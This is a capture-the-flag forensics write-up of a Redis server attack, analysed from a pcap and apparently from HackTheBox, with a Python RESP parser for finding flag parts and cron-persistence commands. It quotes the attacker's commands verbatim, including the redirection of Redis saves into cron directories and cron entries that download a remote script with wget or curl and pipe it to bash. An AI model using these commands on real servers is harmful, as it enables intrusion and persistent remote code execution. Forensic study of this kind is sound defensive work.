forensics · free · hard

Task: analyze a pcap of a Redis server attack to find a three-part flag hidden across data exfiltration, obfuscated bash malware, and AES-encrypted command output. Solution: parse Redis RESP protocol for flag part in user email, deobfuscate reversed-base64 bash script for SSH key comment, reverse engineer .so module to extract AES-256-CBC key/IV and decrypt system.exec responses.

Techniques: bash_deobfuscation, aes_256_cbc_decryption, redis_rogue_server, redis_resp_parsing, elf_reverse_engineering, cron_job_injection, redis_module_rce, split_flag_recovery

RedTrails — HackTheBox

Description

Analyze a pcap capture file (capture.pcap, 291707 bytes) containing network traffic of a Redis server attack. The flag is split into three parts hidden across different stages of the attack.

Files provided:

  • capture.pcap — Network capture (291707 bytes)

Analysis

Network Topology

Three hosts identified in the capture:

Host               Role        Details
10.10.0.15         Attacker    Initiates Redis commands, hosts rogue Redis master
10.10.0.90:6379    Victim      Redis server (target)
10.10.0.50         C2 Server   files.pypi-install.com — malware distribution

Protocols: Redis (RESP), HTTP, TLS. Multiple TCP streams covering the full attack lifecycle.

Attack Flow Overview

The attack follows a classic Redis exploitation chain:

Weak Auth → Data Exfil → Cron Persistence → Rogue Server RCE → Cryptominer Deployment

Phase 1 — Initial Access & Data Exfiltration

TCP stream 0 (10.10.0.15:38342 → 10.10.0.90:6379)

The attacker authenticates and performs reconnaissance:

AUTH 1943567864              # Weak numeric password
COMMAND DOCS                 # Enumerate available commands
INFO                         # Server information
KEYS *                       # List all keys
HGETALL users_table          # Exfiltrate user data

The HGETALL users_table response contains 10 users with MD5 password hashes and emails. Among them:

henry6159 → email: FLAG_PART:_c0uld_0p3n_n3w

🚩 FLAG PART 2: _c0uld_0p3n_n3w

Cron Job Injection

The attacker then pivots to persistence:

CONFIG SET DIR /var/spool/cron
CONFIG SET DBFILENAME root
SET cron1 "\n*/1 * * * * wget -q -O- http://files.pypi-install.com/packages/VgLy8V0Zxo | bash\n"
SET cron2 "\n*/1 * * * * curl -fsSL http://files.pypi-install.com/packages/VgLy8V0Zxo | bash\n"
SET cron3 "\n*/1 * * * * cd /tmp && wget -q http://files.pypi-install.com/packages/VgLy8V0Zxo -O .cache && bash .cache\n"
SAVE
CONFIG SET DIR /var/spool/cron/crontabs
SAVE
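As an added example (not the writeup's own tooling), a small RESP2 parser that pulls the FLAG_PART marker out of the HGETALL users_table reply and flags the CONFIG SET dir cron-persistence pattern shown above; the sample traffic below is constructed for the demo, not taken from capture.pcap.

```python
import re

def parse_resp(buf, pos=0):
    # Parse one RESP2 value at buf[pos]; return (value, offset just past it).
    kind, end = buf[pos:pos + 1], buf.index(b"\r\n", pos)
    line, nxt = buf[pos + 1:end], end + 2
    if kind in (b"+", b"-"):                  # simple string / error
        return line.decode(), nxt
    if kind == b":":                          # integer
        return int(line), nxt
    if kind == b"$":                          # bulk string; $-1 is a null reply
        n = int(line)
        return (None, nxt) if n < 0 else (buf[nxt:nxt + n].decode(errors="replace"), nxt + n + 2)
    if kind == b"*":                          # array: recurse per element
        items = []
        for _ in range(int(line)):
            item, nxt = parse_resp(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError(f"unknown RESP type {kind!r} at offset {pos}")

def parse_stream(buf):
    vals, pos = [], 0                         # one direction of a reassembled TCP stream
    while pos < len(buf):
        val, pos = parse_resp(buf, pos)
        vals.append(val)
    return vals

def encode_array(*items):
    # Client commands and HGETALL replies are both arrays of bulk strings.
    enc = [s.encode() for s in items]
    return b"*%d\r\n" % len(enc) + b"".join(b"$%d\r\n%s\r\n" % (len(s), s) for s in enc)

def find_flag_parts(values):
    # Walk nested replies and collect every FLAG_PART marker.
    found = []
    for v in values:
        found += find_flag_parts(v) if isinstance(v, list) else re.findall(r"FLAG_PART:(\S+)", str(v))
    return found

def cron_persistence_hits(commands, dirs=("/var/spool/cron", "/etc/cron")):
    # CONFIG SET dir aimed at a cron directory is the RDB-as-crontab persistence trick.
    return [c[3] for c in commands if isinstance(c, list) and len(c) == 4 and all(isinstance(s, str) for s in c)
            and [s.upper() for s in c[:3]] == ["CONFIG", "SET", "DIR"] and c[3].startswith(dirs)]

# Constructed sample traffic (not taken from the pcap): client commands, then server replies.
CLIENT = (encode_array("AUTH", "1943567864") + encode_array("HGETALL", "users_table")
          + encode_array("CONFIG", "SET", "dir", "/var/spool/cron"))
SERVER = (b"+OK\r\n" + encode_array("alice", "alice@example.org", "henry6159",
                                    "FLAG_PART:_c0uld_0p3n_n3w") + b"+OK\r\n")
```

Feed each direction of a tshark/scapy-reassembled stream to parse_stream; the same parser also decodes the KEYS * and INFO replies in stream 0.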

...